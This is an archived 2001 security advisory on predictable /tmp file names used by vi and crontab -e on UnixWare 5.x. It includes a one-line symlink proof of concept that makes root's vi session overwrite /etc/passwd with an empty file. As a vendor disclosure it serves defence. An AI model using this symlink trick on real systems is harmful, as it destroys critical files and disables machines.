====================================================================== Strategic Reconnaissance Team Security Advisory(SRT2001-9) Topic: vi and crontab -e /tmp issues Vendor: Santa Cruz Operations Release Date: 05/07/01 ====================================================================== .: Description vi makes poor use of /tmp. File names are very predictable .: Impact as a user ln -s /etc/passwd /tmp/Ex04161 wait for root to run vi and viola when he does he will clobber /etc/passwd with a null file .: Workaround don't use vi or crontab -e .: Systems Affected Unixware 5.x .: Proof of Concept ln -s /etc/passwd /tmp/Ex04161 .: Vendor Status A copy of this advisory was mailed to their attention .: Credit Kevin Finisterre dotslashat_private ====================================================================== ©Copyright 2001 Secure Network Operations , Inc. All Rights Reserved. Strategic Reconnaissance Team | reconat_private http://recon.snosoft.com | http://www.snosoft.com ----------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue May 22 2001 - 15:29:41 PDT